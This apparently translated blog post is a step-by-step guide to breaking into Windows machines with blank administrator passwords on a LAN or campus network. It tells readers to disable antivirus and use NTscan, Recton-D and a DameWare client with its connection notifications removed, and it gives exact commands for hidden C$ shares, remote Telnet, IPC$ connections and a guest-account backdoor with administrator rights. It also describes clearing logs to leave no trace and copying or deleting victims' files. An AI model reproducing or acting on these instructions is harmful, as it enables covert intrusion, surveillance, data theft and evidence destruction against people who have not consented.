First of all, declare that:
1. The scope of intrusion only includes LAN. If it is in school, it can intrusion The whole campus network;
2. The only machine that can intrude is the weak password (the user name is administrator, etc., and the password is empty), or the machine that knows the account password and has opened port 139 but has not opened the firewall.

Intrusion tools:
Generally, three methods are used: NTscan abnormal scanner ， Recton – D Special Edition ， DameWare Mini Chinese Version 4.5 (The first two anti-virus software tools will report viruses. It is recommended to temporarily turn off the real-time anti-virus software and encrypt the compressed package of these two software tools to prevent them from being killed.)

Intrusion steps:
one Use "NTscan Abnormal Scanner", fill in the IP range to be scanned, select "WMI Scan" mode, and press "Start" to wait for the scanning results.
two Use the "Recton – D Special Edition"

Select "CMD command", enter "net share C $=C: " in "CMD:,

This sharing method is highly covert and completely shared. The sharing flag of holding the disk with one hand will not appear on the other host. Then enter " IP C $" in the address bar to enter the other host's C disk.

Select "Telnet", enter an IP scanned just now in "Remote Host", start the Telnet service remotely, and then select "CMD Options" after success,

Execute the command: "net share ipc $", then execute: "net share admin $", and finally execute "net use * * * * * * * * * * * * IPC $"/user: administrator "to fill in the host IP of your intrusion at *.

 

three Use "DameWare Mini Chinese Version 4.5", click "DameWare Mini Remote Control" after installation, select to activate the product in the "Help" item, enter the registration information, and after successful registration,

Enter the "Remote Connection" window, fill in the IP address in the "Host" field, and click "Settings". After clicking "Edit" in the "Service Installation Options", remove "Notification on Connection" from the "Notification Dialog Box", uncheck all "Additional Settings", and remove "Enable User Options Menu" from the "User Options".

After setting, click "Connect". Click "OK" in the pop-up dialog box. After success, you can control other people's computers like operating your own machine. Of course, you can only choose to monitor the other person's screen. Note: If you do not register, a dialog box will pop up on the other host to reveal your identity.

Intrusion procedure supplement:
1. In step 2 above, the remote start of the Telnet service can be completed through "My Computer - Manage - Connect to Another Computer - Enter IP - Services and Applications - Services - Change Telnet to Manual - Start".

2. The Recton-D special version has other functions. In the "Process" item, you can view the process of the remote host and end the process at will; In the Share item, you can create a share

I usually create C $, D $, E $, F $, and share paths corresponding to C: , D: , etc

After sharing, enter IP C $in the address bar, enter the other party's C disk, and you can copy and delete the contents at will. In addition, the sharing icon will not be displayed on the other party's disk symbol, and it will not be found. After that, it is better to turn off sharing.

Finally, select Log to clear all logs without leaving traces. This software will be killed as a virus by anti-virus software, and real-time anti-virus must be turned off when using it.

3. The above sharing can be completed through CMD (program attachment command prompt)

First, "telnet IP", telnet, enter the user name "administrator" after y, and the password is empty. After entering, open the share command to share C $(that is, C disk): "net share C $=C:"

Share system folder: "net share c=c: winnt system32", share IPC $with: "net share IPC $", etc. Finally, close sharing, close C disk sharing: "net share C $/del".

4. To facilitate the next intrusion, you can set the back door, view the user: "net user", and activate the guest user
"Net user guest/active: yes", change the password of the guest to poco: "net user guest poco", and upgrade the privileges of the guest to administrator privileges: "net localgroup administrators guest/add".
5. There are many telnet commands (DOS commands). You can go to the Internet to find its commands. Common commands are: view the D disk file: "" dir d: "", view the C disk program file folder: "dir c: PROGRAM~1 ;", Shutdown when counting down to 60 seconds: "shutdown - s - t 60"

Supplementary notes:
1. Net use:
(1).” A system error 1326 has occurred. Login failure: unknown user name or wrong password. "
In the "Control Panel - Folder Options - View - Simple File Sharing" of the remote machine, remove the selection, and then try to connect again. Simple file sharing will classify all network connection permissions as guest connections, and cannot access C $and other management shares

(2) "System error 1327 occurred. Login failure: user account restriction. Possible reasons include not allowing empty passwords, login time restrictions, or mandatory policy restrictions. " In the "Control Panel - Administrative Tools - Local Security Policy - Security Options - User Rights" assignment of the remote machine, disable "Users with blank passwords can only log on to the console"

(3) "//IP/c $" prompts that the network path cannot be found. Select the Internet Protocol (TCP/IP) attribute in Local Area Connection in Network and Dial up Connection, enter Advanced TCP/IP Settings, select WINS Settings, and there is an item "NETBIOS with TCP/IP enabled"

Original article reprint please specify: reprint from Seven Travelers Blog

Fixed link of this article: https://www.qxzxp.com/4563.html